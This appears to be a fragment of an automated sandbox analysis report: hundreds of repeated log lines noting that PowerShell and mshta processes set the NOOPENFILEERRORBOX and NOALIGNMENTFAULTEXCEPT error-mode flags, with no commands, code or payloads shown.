          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
